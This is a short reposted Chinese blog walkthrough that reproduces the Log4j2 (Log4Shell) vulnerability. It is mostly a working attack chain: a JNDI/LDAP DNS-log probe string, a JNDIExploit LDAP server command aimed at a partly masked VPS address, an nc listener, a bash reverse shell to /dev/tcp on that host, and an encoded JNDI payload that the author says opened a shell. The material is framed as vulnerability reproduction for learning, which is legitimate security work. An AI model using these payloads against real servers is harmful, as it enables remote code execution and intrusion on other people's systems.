Log4j2漏洞復現

本文轉載自查看原文 2021-12-31 10:57 754 中間件安全

二、漏洞復現

可以使用相關的dnslog平台查看，也可以使用burp自帶的dnslog進行查看，我這里使用的是 http://dnslog.cn/

${jndi:ldap://rbmanr.dnslog.cn/exp} 有回顯，說明存在該漏洞

1、首先起一個ldap服務，IP為接收shell的地址。

 java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 139.198.xx.xx

2、在VPS上開啟NC監聽

nc -lvvp 1000

3、使用bash命令反彈shell

bash -i >& /dev/tcp/139.198.xx.xx/1000 0>&1  //，這里需要先base64編碼，然后再進行兩次url編碼。

${jndi:ldap://VPSIP:1389/TomcatBypass/Command/Base64/YmFzaCAtaSsfqwA%252BJiAvzkuMTk4LjEyNS45OSgas85OTk5IDA%252BJjE%253D}

成功反彈shell到我們的VPS上

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 LOG4j2 漏洞復現 log4j2漏洞復現 apache log4j2 漏洞復現linux【純詳版】 log4j2 漏洞解析記一次vulfocus靶場log4j2命令執行漏洞復現 springboot 解決log4j2漏洞 Log4j RCE漏洞復現 Log4j2 漏洞檢測工具清單 apache log4j2 遠程代碼執行漏洞 Apache log4j2遠程代碼執行漏洞